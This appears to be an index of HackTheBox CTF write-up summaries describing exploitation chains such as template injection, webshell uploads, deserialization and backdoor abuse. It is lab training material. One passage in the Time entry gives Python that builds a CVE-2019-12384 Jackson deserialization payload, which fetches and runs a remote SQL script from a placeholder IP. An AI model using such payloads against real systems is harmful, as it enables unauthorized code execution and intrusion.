HackTheBox made Gobox to be used in the Hacking Esports UHC competition on Aug 29, 2021. Once the competition was over, HTB put it out for all of us to play. This is a neat box, created by IppSec, where I’ll exploit a server-side template injection vulnerability in a Golang webserver to leak creds to the site, and then the full source. I’ll use the source with the SSTI to get execution, but no shell. I’ll write a script to make enumeration easy, and then identify the host is in AWS, and is managing a bucket that hosts another site. I’ll upload a PHP webshell to get a shell on the main host. Finally, I’ll find a backdoor NGINX module which is enabled, reverse it to get execution, and get a shell as root.
HTB: Knife
ctf hackthebox htb-knife nmap php-backdoor feroxbuster php-8.1.0-dev sudo knife gtfobins vim oscp-like
Knife is one of the easier boxes on HTB, but it’s also one that has gotten significantly easier since its release. I’ll start with a webserver that isn’t hosting much of a site, but is leaking that it’s running a dev version of PHP. This version happens to be the version that had a backdoor inserted into it when the PHP development servers were hacked in March 2021. At the time of release, just searching for this version string didn’t immediately lead to the backdoor, but within two days of release it did. For root, the user can run knife as root. At the time of release, there was no GTFObins page for knife, so the challenge required reading the docs to find a way to run arbitrary code. That page now exists.
Pivoting off Phishing Domain
forensics threat-intel phishing riskiq maltego youtube
John Hammond’s YouTube channel is full of neat stuff, from CTF solutions to real malware analysis. Recently, he did an analysis of an email with an HTML attachment which presented as a fake Microsoft login page. When a victim enters creds, the page would send them to[.]us, and redirect the user to an actual Microsoft Outlook site. John looked a bit at the registration information on the domain, but I wanted to dive a bit deeper, specifically using RiskIQ and Maltego.
HTB: Proper
ctf htb-proper hackthebox nmap windows iis gobuster ajax sqlmap sqli keyed-hash sqli-orderby sqlmap-eval hashcat lfi rfi time-of-check-time-of-use inotifywait go ida ghidra arbitrary-write reverse-engineering arbitrary-read wertrigger pipe-monitor powershell named-pipe cve-2021-1732 htb-hackback htb-scriptkiddie
Proper was a fascinating Windows box with three challenging stages. First, there’s a SQL injection, but the URL parameters are hashed with a key, so I need to leak that key, and then make sure to update the hash for each request. I get to play with the eval option for SQLmap, as well as show some manual scripting to do it. Next, there’s a time of check / time of use vulnerability in a file include that allows me to do a remote file include over SMB, swapping out the contents between the first and second read to get code execution. For root, there’s a Go binary that does cleanup of files in the user’s Downloads folder that I can abuse to get arbitrary write as SYSTEM. I’ll abuse this with the Windows error reporting system to get execution. In Beyond Root, I’ll look at a couple more ways to get root using this binary.
HTB: CrossFitTwo
hackthebox ctf htb-crossfittwo nmap openbsd feroxbuster burp websocket sqli injection vhosts unbound python python-cmd flask sqlmap relayd api wfuzz cors phishing socket-io javascript nodejs node-modules yubikey changelist ykgenerate
Much like CrossFit, CrossFitTwo was just a monster of a box. The centerpiece is a crazy cross-site scripting attack through a password reset interface using DNS to redirect the admin to a site I control to then have them register an account for me. I’ll then hijack some socket.io messages to get access to chats where I’ll capture a password to get a shell. On the box, I’ll abuse NodeJS’s module load order, then extract the root SSH key from a changelist backup and the yubikey seed needed to get SSH as root.
HTB: Love
hackthebox ctf htb-love nmap vhosts voting-system searchsploit feroxbuster ssrf burp webshell upload winpeas alwaysinstallelevated msi htb-ethereal msfvenom oscp-like
Love was a solid easy-difficulty Windows box, with three stages. First, I’ll use a simple SSRF to get access to a webpage that is only allowed to be viewed from localhost that leaks credentials for a Voting System instance. Then, I’ll exploit an upload vulnerability in Voting System to get RCE, showing both using the searchsploit script and manual exploitation. Finally, I’ll abuse the AlwaysInstallElevated setting to get a system shell.
HTB: TheNotebook
ctf htb-thenotebook hackthebox nmap feroxbuster jwt jwt-io upload webshell cve-2019-5736 runc docker go
TheNotebook starts off with a website where I’ll abuse a JWT misconfiguration to convince the server to validate my token using a key hosted on my server. From there, I’ll get access to a site where I can upload a PHP webshell and get execution. After finding an SSH key in a backup, I’ll exploit a vulnerability in runc, the executable that underlies Docker, to get execution as the root user on the host.
HTB: Armageddon
hackthebox htb-armageddon ctf nmap ubuntu drupal drupalgeddon2 searchsploit webshell upload hashcat mysql sudo snap snapcraft burp oscp-like
Armageddon was a box targeted at beginners. The foothold exploit, Drupalgeddon2, has many public exploit scripts that can be used to upload a webshell and run commands. I’ll get access to the database and get the admin’s hash, crack it, and find that the password is reused on the host as well. To get root, I’ll abuse the admin’s ability to install snap packages as root.
HTB: Breadcrumbs
ctf htb-breadcrumbs hackthebox nmap gobuster burp python cookies jwt upload webshell defender password-reuse tunnel stickynotes sqlite ghidra chisel sqli injection cyberchef aes crypto htb-buff oscp-plus
Breadcrumbs starts with a fair amount of web enumeration and working to get little bits of additional access. First I’ll leak the page source with a directory traversal vulnerability, and use that to get the algorithms necessary to forge both a session cookie and a JWT token. With both of those cookies, I gain administrator access to the site, and can upload a webshell after bypassing some filtering and Windows Defender. I’ll find the next user’s data in the website files. I’ll find another password in Sticky Notes data, and use that to get access to a new password manager under development. To get to administrator, I’ll exploit a SQL injection in the password manager to get the encrypted password and the key material to decrypt it, providing the admin password.
HTB: Atom
ctf htb-atom hackthebox nmap xampp redis reverse-engineering portable-kanban smbmap smbclient crackmapexec feroxbuster asar nodejs electron wireshark msfvenom cyberchef printnightmare invoke-nightmare cve-2021-34527 htb-sharp oscp-plus
Atom was a box that involved insecure permissions on an update server, which allowed me to write a malicious payload to that server and get execution when an Electron App tried to update from my host. I’ll reverse the electron app to understand the tech, and exploit it to get a shell. For root, I’ll have to exploit a Portable-Kanban instance which is using Redis to find a password. In Beyond Root, a quick visit back to PrintNightmare.
Playing with PrintNightmare
hackthebox htb-heist cve-2021-1675 cve-2021-34527 printnightmare evil-winrm invoke-nightmare sharpprintnightmare dll samba visual-studio htb-hackback
HTB: Ophiuchi
htb-ophiuchi hackthebox ctf nmap ubuntu yaml tomcat java jar deserialization gobuster marshalsec yaml-payload wasm wasm-fiddle htb-ropetwo oscp-like
Ophiuchi presented two interesting attacks. First there was a Java YAML deserialization attack that involved generating a JAR payload to inject via a serialized payload. Then there was a somewhat contrived challenge that forced me to generate web assembly (or WASM) code to get execution of a Bash script.
HTB: Spectra
hackthebox ctf htb-spectra nmap chromeos nano wordpress wpscan wordpress-plugin credentials password-reuse autologon-credentials initctl sudo
Spectra was the first ChromeOS box on HackTheBox. I’ll start looking at a web server and find a password as well as a WordPress site. The password gets me into the admin panel, where I can edit a plugin or write a new plugin to get execution. From there I’ll find auto-login credentials and use them to get a shell as the next user. That user can control the init daemon with sudo, which I’ll abuse to get root.
HTB: Tentacle
hackthebox htb-tentacle ctf nmap dig dns dnsenum vhosts kerbrute kerberos ntpdate squid as-rep-roast john proxychains nmap-over-proxy wpad opensmtpd exploitdb cve-2020-7247 msmtprc credentials password-reuse kinit keytab klist htb-unbalanced htb-joker getfacl facl
Tentacle was a box of two halves. The start is all about squid proxies, and bouncing through two of them (one of them twice) to access an internal network, where I’ll find a wpad config file that alerts me to another internal network. In that second network, I’ll exploit an OpenSMTPd server and get a foothold. The second half was about abusing Kerberos in a Linux environment. I’ll use creds to get SSH authenticated by Kerberos, then abuse a backup script that gives that principal access as another user. That user can access the KeyTab file, which allows them to administer the domain, and provides root access. In Beyond Root, a dive too deep into the rabbit hole of understanding the KeyTab file.
HTB: Enterprise
htb-enterprise hackthebox ctf nmap docker ubuntu debian wordpress joomla wpscan feroxbuster wordpress-plugin sqli sqlmap error-based-sqli password-reuse webshell xinetd bof ret2libc ltrace ghidra pattern checksec gdb peda pwntools python htb-frolic
To own Enterprise, I’ll have to work through different containers to eventually reach the host system. The WordPress instance has a plugin with available source and a SQL injection vulnerability. I’ll use that to leak creds from a draft post, and get access to the WordPress instance. I can use that to get RCE on that container, but there isn’t much else there. I can also use those passwords to access the admin panel of the Joomla container, where I can then get RCE and a shell. I’ll find a directory mounted into that container that allows me to write a webshell on the host, and get RCE and a shell there. To privesc, I’ll exploit a service with a simple buffer overflow using return to libc. In Beyond Root, I’ll dig more into the Double Query Error-based SQLI.
HTB: Tenet
ctf hackthebox htb-tenet nmap gobuster vhosts wordpress wpscan php deserialization webshell password-reuse credentials race-condition bash
Tenet provided a very straight-forward deserialization attack to get a foothold and a race-condition attack to get root. Both are the kinds of attacks seen more commonly on hard- and insane-rated boxes, but presented at medium difficulty here.
HTB: Node
htb-node hackthebox ctf nmap express nodejs feroxbuster crackstation john source-code password-reuse bof ret2libc mongo ltrace ghidra pattern-create checksec aslr aslr-brute-force exploit command-injection filter wildcard
Node is about enumerating an Express NodeJS application to find an API endpoint that shares too much data, including user password hashes. To root the box, there’s a simple return to libc buffer overflow exploit. I had some fun finding three other ways to get the root flag, as well as one that didn’t work out.
HTB: ScriptKiddie
ctf htb-scriptkiddie hackthebox nmap searchsploit msfvenom cve-2020-7384 msfconsole command-injection injection incron irb oscp-like
ScriptKiddie was the third box I wrote that has gone live on the HackTheBox platform. From the time I first heard about the command injection vulnerability in msfvenom, I wanted to make a box themed around a novice hacker and try to incorporate it. To own this box, I’ll find the website, which has a few tools a hacker might use, including an option to have msfvenom create a payload. I’ll upload a malicious template and get code execution on the box. From there, I’ll exploit a cron with another command injection to reach the next user. Finally, to root, I’ll abuse the sudo rights of that user to run msfconsole as root, and use the built in shell commands to get a root shell. In Beyond Root, a look at some of the automations I put in place for the box.
Cereal Unintended Root
ctf hackthebox htb-cereal dotnet iis timing-attack
There’s a really neat unintended path to root on Cereal discovered by HackTheBox user FF5. The important detail to notice is that a shell as sonny running via a webshell has additional groups related to IIS that don’t show up in an SSH shell. I can use these groups to exploit the IIS service and how it manages the website running as root with a timing attack that will allow me to slip my own code into the site and execute it. I’ll find the directory where IIS stages files and compiles them, the Shadow Copy Folders. I’ll delete everything in there, and trigger IIS to rebuild. It will copy the source into the directory and compile it, but there’s a chance for me to modify the source between the copy and the compile.
HTB: Cereal
ctf hackthebox htb-cereal nmap iis windows vhosts wfuzz feroxbuster react dotnet csharp git gitdumper source-code jwt python javascript visualstudio ssrf xss deserialization json-deserialization npm npm-audit react-marked-markdown webshell aspx roguepotato potato sweetpotato printspoofer graphql graphql-voyager graphql-playground jq ssrf genericpotato htb-hackback
Cereal was all about taking attacks I’ve done before, and breaking the ways I’ve previously done them so that I had to dig deeper and really understand them. I’ll find the source for a website on an exposed Git repo. The site is built in C#/.NET on the backend, and React JavaScript on the client side. I’ll first have to find the code that generates authentication tokens and use that to forge a token that gets me past the login. There I have access to a form that can submit cereal flavor requests. I’ll chain together a cross-site scripting vulnerability and a deserialization vulnerability to upload a webshell. That was made more tricky because the serverside code had logic in place to break payloads generated by YSoSerial. With execution, I’ll find the first user password and get SSH access. That user has SeImpersonate. But with no print spooler service on the box, and no outbound TCP port 135, none of RoguePotato, SweetPotato, or PrintSpoofer could abuse it to get a SYSTEM shell. I’ll enumerate a site running on localhost and its GraphQL backend to find a serverside request forgery vulnerability, which I’ll abuse with GenericPotato to get a shell as System.
HTB: Shocker
htb-shocker hackthebox ctf nmap feroxbuster cgi shellshock bashbug burp cve-2014-6271 gtfobin
The name Shocker gives away pretty quickly what I’ll need to do on this box. There were a couple things to look out for along the way. First, I’ll need to be careful when directory brute forcing, as the server is misconfigured in that the cgi-bin directory doesn’t show up without a trailing slash. This means that tools like gobuster and feroxbuster miss it in their default state. I’ll show both manually exploiting ShellShock and using the nmap script to identify it is vulnerable. Root is a simple GTFObin in perl. In Beyond Root, I’ll look at the Apache config and go down a rabbit hole looking at what commands cause execution to stop in ShellShock and try to show how I experimented to come up with a theory that seems to explain what’s happening.
HTB: Delivery
ctf hackthebox htb-delivery nmap vhosts osticket mattermost password-reuse mysql hashcat hashcat-rules oscp-like
Delivery is an easy-rated box that I found very beginner friendly. It didn’t require anything technically complex, but rather a bit of creative thinking. The box presents a helpdesk and an instance of Mattermost. By creating a ticket at the helpdesk, I get an email that I can use to update the ticket. I’ll use that email to register a Mattermost account, where I find internal conversations that include creds for SSH. With access to the box, I’ll check out the database and dump the root password hash. Using hashcat rules mentioned in the Mattermost chat, I’ll crack that password, which is the root password on the box.
HTB: Kotarak
htb-kotarak ctf hackthebox nmap tomcat feroxbuster ssrf msfvenom war container lxc ntds secretsdump wget cve-2016-4971 authbind disk lvm htb-nineveh htb-jerry htb-tabby
Kotarak was an old box that I had a really fun time replaying for a writeup. It starts with an SSRF that allows me to find additional webservers on ports only listening on localhost. I’ll use that to leak a Tomcat config with username and password, and upload a malicious war to get a shell. From there, I can access files from an old Windows pentest to include an ntds.dit file and a system hive. That’s enough to dump a bunch of hashes, one of which cracks and provides creds I can use to get the next user. The root flag is actually in a container that is using Wget to request a file every two minutes. It’s an old vulnerable version, and a really neat exploit that involves sending a redirect to an FTP server and using that to write a malicious config file in the root home directory in the container. I’ll also show an alternative root abusing the user’s disk group to exfil the entire root filesystem and grab the flag on my local system.
Digging into cgroups Escape
ctf hackthebox htb-ready docker container cgroups escape overlayfs release-agent
The method I used in Ready to get code execution on the host system from a docker container running as privileged was a series of bash commands that didn’t make any sense on first glance. I wanted to dive into them and see what was happening under the hood.
HTB: Ready
ctf htb-ready hackthebox nmap ubuntu gitlab cve-2018-19571 ssrf cve-2018-19585 crlf-injection burp redis docker container escape docker-privileged cgroups oscp-like
Ready was another opportunity to abuse CVEs in GitLab to get a foothold in a GitLab container. Within that container, I’ll find some creds that will escalate to root. I’ll also notice that the container is run with the privileged flag, which gives it a lot of power with respect to the host system. I’ll show two ways to abuse this, using cgroups and just accessing the host filesystem.
HTB: Blue
htb-blue hackthebox ctf nmap nmap-scripts smbmap smbclient metasploit ms17-010 eternalblue meterpreter impacket virtualenv
Blue was the first box I owned on HTB, on 8 November 2017. And it really is one of the easiest boxes on the platform. The root first blood went in two minutes. You just point the exploit for MS17-010 (aka ETERNALBLUE) at the machine and get a shell as System. I’ll show how to find the machine is vulnerable to MS17-010 using Nmap, and how to exploit it with both Metasploit and using Python scripts.
HTB: Attended
hackthebox htb-attended ctf nmap smtp stmp-user-enum swaks phishing vim cve-2019-12735 vim-modelines firewall scripting python ssh-config ssh-keys ping-sweep nc-port-scan openbsd reverse-engineering ida gdb debug ssh-keygen bof rop pattern-create ropper command-injection htb-flujab htb-ypuffy htb-travel
Attended was really hard. At the time of writing three days before it retires, just over 100 people have rooted it, making it the least rooted box on HackTheBox. It starts with a phishing exercise where hints betray that the user will open a text file in Vim, opening them to the Vim modelines exploit to get command execution. But there’s a firewall blocking any outbound traffic that isn’t ICMP or a valid HTTP GET request, so I’ll write some scripts to build command and control through that. Then I find a place I can drop an SSH config file that will be run by the second user, which I’ll abuse to get SSH access. For root, there’s a buffer overflow in a command processing SSH auth on the gateway. I’ll craft a malicious SSH key to overflow that binary and get a reverse shell. In Beyond Root, I’ll look at an unintended command injection in the SSH config running script.
Networking VMs for HTB
ctf hackthebox configuration virtual-machine parrot-os
When doing HTB or other CTFs, I typically run from a Linux VM (formerly Kali, lately Parrot), but I also need to use a Windows VM from time to time as well. Some of those times, I’ll need to interact with the HTB machines over the VPN from the Windows host, and it’s always a bit of a pain to turn off the VPN in the Linux VM, and then turn it on from Windows. This post shows how I configured my VMs so that Windows traffic can route through the Linux VM to HTB.
More Bucket Beyond Root
ctf htb-bucket hackthebox s3 aws awscli apache docker localstack cron automation
@teh_zeron reached out on Twitter to ask why there’s no images directory in the webroot on Bucket. I showed how my PHP webshell will show up there, and the index page seems to always be there. I’ll look closely at how Bucket was set up, how different requests are handled, and the automation that is syncing between the host and the container.
HTB: Sharp
hackthebox htb-sharp ctf nmap portable-kanban reverse-engineering dnspy crypto crackmapexec dotnet-remoting ysoserial.net deserialization exploitremotingservice wcf visual-studio csharp htb-json
Sharp was all about C# and .NET. It started with a PortableKanban config. At the time of release, there were no public scripts for decrypting the database, so it involved reverse engineering a real .NET binary. From there, I’ll reverse and exploit a .NET remoting service with a serialized payload to get a shell as user. To escalate to SYSTEM, I’ll reverse a Windows Communication Foundation (WCF)-based service to find an endpoint that runs PowerShell code. I’ll create a client to return a reverse shell. I’m also going to solve this one from a Windows VM (mostly).
HTB: Toolbox
hackthebox htb-toolbox ctf nmap windows wfuzz docker-toolbox sqli injection postgres sqlmap default-creds docker container
Toolbox is a machine that released directly into retired as a part of the Containers and Pivoting Track on HackTheBox. It’s a Windows instance running an older tech stack, Docker Toolbox. Before Windows could support containers, this used VirtualBox to run a lightweight custom Linux OS optimized for running Docker. I’ll get a foothold using SQL injection which converts into RCE with sqlmap. Then I’ll use default credentials to pivot into the VM, where I find an SSH key that gives administrator access to the host system.
HTB: Bucket
ctf htb-bucket hackthebox s3 aws awscli nmap vhosts wfuzz upload webshell php credentials password-reuse dynamodb tunnel localstack pd4ml pdfdetach getfacl facl
Bucket is a pentest against an Amazon AWS stack. There’s an S3 bucket that is being used to host a website and is configured to allow unauthenticated read / write. I’ll upload a webshell to get a foothold on the box. From there, I’ll access the DynamoDB instance to find some passwords, one of which is re-used for the user on the box. There’s another webserver on localhost with an in-development service that creates a PDF based on entries in the database. I’ll exploit that to get file read on the system as root, and turn that into a root shell. In Beyond Root, I’ll look at some of the configuration that allowed the box to simulate AWS inside HTB.
HTB: Laboratory
hackthebox htb-laboratory ctf gitlab nmap vhosts gobuster searchsploit cve-2020-10977 deserialization hackerone docker ruby irb suid path-hijack
As the name hints at, Laboratory is largely about exploiting a GitLab instance. I’ll exploit a CVE to get arbitrary read and then code execution in the GitLab container. From there, I’ll use that access to get access to the admin’s private repo, which happens to have an SSH key. To escalate to root, I’ll exploit a SUID binary that is calling
system("chmod ...") in an unsafe way, dropping my own binary and modifying the PATH so that mine gets run as root.
HTB: APT
hackthebox htb-apt ctf nmap ipv6 rpc ioxidresolver active-directory domain-controller crackmapexec hashcat secretsdump ntds kerbrute wail2ban pykerbrute mimikatz passthehash powershell remote-registry powerview reg-py evil-winrm history lmcompatibilitylevel net-ntlmv1 winpeas seatbelt amsi defender responder roguepotato ntlmrelayx visual-studio crack-sh powershell-history oscp-plus
APT was a clinic in finding little things to exploit in a Windows host. I’ll start with access to only RPC and HTTP, and the website has nothing interesting. I’ll use RPC to identify an IPv6 address, which when scanned, shows typical Windows DC ports. Over SMB, I’ll pull a zip containing files related to an Active Directory environment. After cracking the password, I’ll use these files to dump 2000 users / hashes. Kerbrute will identify one user that is common between the backup and the AD on APT. The hash for that user doesn’t work, and brute forcing using NTLM hashes gets me blocked using SMB, so I’ll modify pyKerbrute to test all the hashes from the backup with the user, finding one that works. With that hash, I can access the registry and find additional creds that provide WinRM access. With a shell, I’ll notice that the system still allows Net-NTLMv1, which is an insecure format. I’ll show two ways to get the Net-NTLMv1 challenge response, first an unintended path using Defender and Responder, and then the intended path using RoguePotato and a custom RPC server created by modifying NTLMRelayX.
HTB: Time
ctf htb-time hackthebox nmap cve-2019-12384 java deserialization json-deserialization sql linpeas systemd short-lived-shells oscp-like
Time is a straightforward box with two steps and low enumeration. The first step involves looking at the error code coming off a web application and some Googling to find an associated CVE. From there, I’ll build a serialized JSON payload using the template in some of the CVE writeups, and get code execution and a shell. There’s a Systemd timer running every few seconds, and the script being run is world writable. To get root, I’ll just add some commands to that script and let it run. In Beyond Root, I look at the webserver and whether I could write a file in the webroot, and also at handling the initial short-lived shell I got from the Systemd timer.
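For context, the serialized JSON payload template published in CVE-2019-12384 writeups points Jackson’s polymorphic deserialization at logback’s DriverManagerConnectionSource, whose H2 JDBC URL can RUNSCRIPT a remote SQL file. A sketch that just builds that payload shape — the IP and script name are placeholders, not values from the box:

```python
import json

# Gadget shape from public CVE-2019-12384 writeups: Jackson instantiates
# the logback DriverManagerConnectionSource, and the H2 in-memory JDBC
# URL's INIT clause runs a remote SQL script (placeholder URL).
payload = json.dumps([
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
    {"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;"
            "INIT=RUNSCRIPT FROM 'http://10.10.14.2/inject.sql'"},
])
print(payload)
```

The hosted inject.sql would define an H2 alias that shells out, which is where the code execution comes from.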
HTB: Luanne
htb-luanne ctf hackthebox nmap netbsd supervisor-process-manager default-creds http-basic-auth burp feroxbuster api lua command-injection htpasswd hashcat doas pgp netpgp source-code oscp-like
Luanne was the first NetBSD box I’ve done on HTB. I’ll gain access to an instance of Supervisor Process Manager, and use that to leak a process list, which shows where to look on the port 80 webserver. I’ll find an API that I know is backed by a Lua script, and exploit a command injection vulnerability to get execution and a shell. I’ll get credentials for a webserver listening on localhost and find an SSH key hosted there to get to the second user. That user can doas (like sudo on BSD) arbitrary commands as root, but the password is needed. It’s in an encrypted backup file which can be decrypted using PGP on the host. In Beyond Root, I’ll look at the Lua script, figure out how it works, where the injection vulnerability is, and compare that to the patched dev version to see how it was fixed.
HTB: CrossFit
htb-crossfit hackthebox ctf nmap ftp-tls openssl wfuzz vhosts gobuster xss javascript xmlhttprequest cors csrf laravel lftp webshell ansible credentials hashcat php-shellcommand vsftpd pam hidepid pspy reverse-engineering ghidra arbitrary-write
CrossFit is all about chaining attacks together to get the target to do my bidding. It starts with a cross-site scripting (XSS) attack against a website. The site detects the attack, and forwards my user agent to the admins for investigation. An XSS payload in the user-agent will trigger, giving some access there. I’ll abuse cross-origin resource sharing (CORS) to identify another subdomain, and then use the XSS to do a cross-site request forgery, having the admins create an account for me on that subdomain, which provides FTP access, where I can upload a webshell, and use the XSS once again to trigger it for a reverse shell. I’ll dig a hash out of ansible configs and crack it to get the next user. To escalate again, I’ll exploit a command injection vulnerability in a PHP plugin, php-shellcommand, by writing to the database. To get root, I’ll reverse engineer a binary that runs on a cron and figure out how to trick it to write an SSH key into root’s authorized_keys file.
HTB: Optimum
hackthebox htb-optimum ctf nmap windows httpfileserver hfs searchsploit cve-2014-6287 nishang winpeas watson sherlock process-architechure ms16-032 cve-2016-0099 htb-bounty
Optimum was the sixth box on HTB, a Windows host with two CVEs to exploit. The first is a remote code execution vulnerability in the HttpFileServer software. I’ll use that to get a shell. For privesc, I’ll look at unpatched kernel vulnerabilities. Today to enumerate these I’d use Watson (which is also built into winPEAS), but getting the new version to work on this old box is actually challenging, so I’ll use Sherlock (a predecessor to Watson) to identify these vulnerabilities. I got hung up for a bit not realizing my shell was running in a 32-bit process, causing my kernel exploits to fail. I’ll show some analysis of that as well.
Reel2: Root Shellhackthebox ctf htb-reel2 htb-reel nmap wallstant apache xampp mysql webshell chisel
Both YB1 and JKR suggested a neat method for getting a shell on Reel2 that involves abusing the Apache Web server running as SYSTEM to write a webshell. It’s a neat path that involves identifying where the config files are and getting access to the database using the arbitrary read intended to get the root flag.
HTB: Reel2hackthebox htb-reel2 ctf windows nmap gobuster owa wallstant javascript sprayingtoolkit phishing responder hashcat ps-remoting jea jea-escape stickynotes
Much like its predecessor, Reel, Reel2 was focused on realistic attacks against a Windows environment. This time I’ll collect names from a social media site and use them to password spray using the SprayingToolkit. Once I find a working password, I’ll send a link from that account and get an NTLM hash using responder. From there I need to break out of a JEA limited PowerShell, find creds to another account, and trick a custom command from that account into reading root.txt.
HTB: Sensehtb-sense hackthebox ctf oscp-like pfsense nmap gobuster dirbuster searchsploit metasploit command-injection feroxbuster cve-2016-10709 burp
Sense is a box my notes show I solved almost exactly three years ago. It’s a short box, using directory brute forcing to find a text file with user credentials, and using those to gain access to a pfSense firewall. From there I’ll exploit a code injection using Metasploit to get code execution and a shell as root. In Beyond Root, I’ll look at a couple things that I would do differently today. First, I’ll show off Feroxbuster for the recursive directory brute force, and then I’ll dig into the exploit, how it works, and how it might be done without Metasploit.
HTB: Passagehtb-passage ctf hackthebox nmap cutenews webshell upload searchsploit github source-code base64 penglab hashcat vim usbcreator arbitrary-write arbitrary-read cyberchef oscp-like passwd
In Passage, I’ll find and exploit CuteNews with a webshell upload. I’ll have to analyze the CuteNews source to figure out how it stores user data in files to find the hash for the next user, which I’ll crack. That user shares an SSH key with the next user on the box. To root, I’ll exploit a bug in USBCreator that allows me to run sudo without knowing the user’s password. In Beyond Root, I’ll dive into the basics of base64 and how to search for strings in large amounts of base64 data.
HTB: Sneakyhackthebox htb-sneaky ctf nmap udp snmp mibs gobuster sqli injection auth-bypass onesixtyone snmpwalk ipv6 suid bof pwn reverse-engineering ghidra gdb shellcode
Sneaky presented a website that after some basic SQL injection, leaked an SSH key. But SSH wasn’t listening. At least not on IPv4. I’ll show three ways to find the IPv6 address of Sneaky, and then SSH using that address to get user. For root, there’s a simple buffer overflow with no protections. I’ll show a basic attack, writing shellcode onto the stack and then returning into it.
HTB: Academyhackthebox ctf htb-academy nmap ubuntu php laravel vhosts gobuster cve-2018-15133 deserialization metasploit password-reuse credentials adm logs aureport composer gtfobins
HackTheBox releases a new training product, Academy, in the most HackTheBox way possible - By putting out a vulnerable version of it to hack on. There’s a website with a vulnerable registration page that allows me to register as admin and get access to a status dashboard. There I find a new virtual host, which is crashing, revealing a Laravel crash with data including the APP_KEY. I can use that to create a serialized payload to submit as an HTTP header or cookie to get execution. From there, I’ll reuse database creds to get to the next user, and then find more creds in auth logs, and finally get root with sudo composer.
HTB: Beepctf htb-beep hackthebox nmap elastix pbx dirsearch searchsploit lfi webmin smtp svwar sslscan shellshock webshell upload credentials password-reuse oscp-like htb-unattended
Even when it was released there were many ways to own Beep. I’ll show five, all of which were possible when this box was released in 2017. Looking at the timestamps on my notes, I completed Beep in August 2018, so this writeup will be a mix of those plus new explorations. The box is centered around PBX software. I’ll exploit an LFI, RCE, two different privescs, webmin, credential reuse, ShellShock, and webshell upload over SMTP.
HTB: Felinehackthebox htb-feline ctf nmap ubuntu upload tomcat deserialization java cve-2020-9484 ysoserial docker saltstack cve-2020-11651 chisel docker-sock container socat htb-fatty htb-arkham
Feline was another Tomcat box, this time exploiting a neat CVE that allowed me to upload a malicious serialized payload and then trigger it by giving a cookie that points the session to that file. The rest of the box focuses on Salt Stack, an IT automation platform. My foothold shell is on the main host, but Salt is running in a container. I’ll exploit another CVE to get a shell in the Salt container, and then exploit that container’s access to the docker socket to get root on the host. In Beyond Root, I’ll show an alternative way of interacting with the docker socket by uploading the docker binary, and I’ll look at the permissions on that socket and how it’s shared into the container.
HTB: Charonhtb-charon ctf hackthebox nmap gobuster sqli injection command-injection filter bash waf crackstation upload webshell burp burp-repeater crypto rsa rsactftool history suid ltrace ghidra
Another 2017 box, but this one was a lot of fun. There’s an SQL injection that’s designed to break sqlmap (I didn’t bother trying sqlmap, but saw from others once I finished that it breaks). Then there’s a file upload, some crypto, and a command injection. I went into good detail on the manual SQLI and the RSA crypto. In Beyond Root, I’ll look at a second SQLI that didn’t prove useful, and at the filters I had to bypass on the useful SQLI.
HTB: Jewelctf htb-jewel hackthebox nmap gitweb git ruby rails gemfile cve-2020-8164 irb deserialization google-authenticator totp postgres penglab hashcat oathtool gem
Jewel was all about Ruby, with a splash of Google Authenticator 2FA in the middle. I’ll start with an instance of GitWeb providing the source for a website. That source allows me to identify a Ruby on Rails deserialization exploit that provides code execution. To escalate, I’ll find the user’s password in the database, and the seed for the Google Authenticator to calculate the time-based one time password, both of which are needed to run sudo. From there, I can use GTFObins to get execution from the gem program.
HTB: Apocalysthackthebox htb-apocalyst ctf nmap wordpress wpscan gobuster wfuzz steghide passwd
Apocalyst wasn’t my favorite box. It is all about building a wordlist to find a specific image file on the site, and then extracting another list from that image using StegHide. That list contains the WordPress user’s password, giving access to the admin panel and thus execution. To root, I’ll find a writable passwd file and add in a root user.
HTB: Doctorhackthebox ctf htb-doctor nmap splunk vhosts flask payloadsallthethings ssti command-injection injection adm linpeas splunk-whisperer2 oscp-like htb-secnotes
Doctor was about attacking a message board-like website. I’ll find two vulnerabilities in the site, Server-Side Template Injection and command injection. Either way, the shell I get back has access to read logs, where I’ll find a password sent to a password reset url, which works for both the next user and to log into the Splunk Atom Feed. I’ll exploit that with SplunkWhisperer2 to get RCE and a root shell. In Beyond Root, I’ll look at a strange artifact I found on the box, and examine the source for both web exploits.
HTB: Europahtb-europa ctf hackthebox vhosts wfuzz sqli injection sqlmap preg_replace cron
Europa was a relatively easy box by today’s HTB standards, but it offers a good chance to play with the most basic of SQL injections, the auth bypass. I’ll also use sqlmap to dump the database. The foothold involves exploiting the PHP preg_replace function, which is something you’ll only see on older hosts at this point. To get root, I’ll find a cron job that calls another script that I can write.
HTB: Workerhtb-worker hackthebox ctf svn credentials password-reuse vhosts wfuzz azure azure-devops burp devops pipeline git webshell upload aspx evil-winrm azure-pipelines potato roguepotato juicypotato chisel socat tunnel oscp-like cicd htb-sizzle htb-json
Worker is all about exploiting an Azure DevOps environment. I’ll find creds in an old SVN repository and use them to get into the Azure DevOps control panel where several websites are managed. I’ll upload a webshell into one of the sites and rebuild it, gaining execution and a shell. With the shell I’ll find creds for another user, and use that to get back into Azure DevOps, this time as someone with permission to create pipelines, which I’ll use to get a shell as System. In Beyond Root, I’ll show RoguePotato, as this was one of the first vulnerable boxes to release after that came out.
HTB: Compromisedhackthebox ctf htb-compromised ubuntu litecart searchsploit gobuster mysql credentials php mysql-udf upload webshell disable-functions phpinfo strace pam-backdoor ldpreload-backdoor ghidra ghidra-version-tracking reverse-engineering ldpreload htb-stratosphere
Compromised involves a box that’s already been hacked, and so the challenge is to follow the hacker, both exploiting public vulnerabilities and making use of backdoors left behind by the hacker. I’ll find a website backup file that shows how the login page was backdoored to record admin credentials to a web-accessible file. With those creds, I’ll exploit a vulnerable LiteCart instance, though the public exploit doesn’t work. I’ll troubleshoot that to find that the PHP functions typically used for execution are disabled. I’ll show two ways to work around that to get access to the database and execution as the mysql user, whose shell has been enabled by the hacker. As the mysql user, I’ll find a strace log, likely a makeshift keylogger used by the hacker, with creds to pivot to the next user. To get root, I’ll take advantage of either of two backdoors left on the box by the attacker, a PAM backdoor and an LD_PRELOAD backdoor. In Beyond Root, I’ll show how to run commands as root using the PAM backdoor from the webshell as www-data.
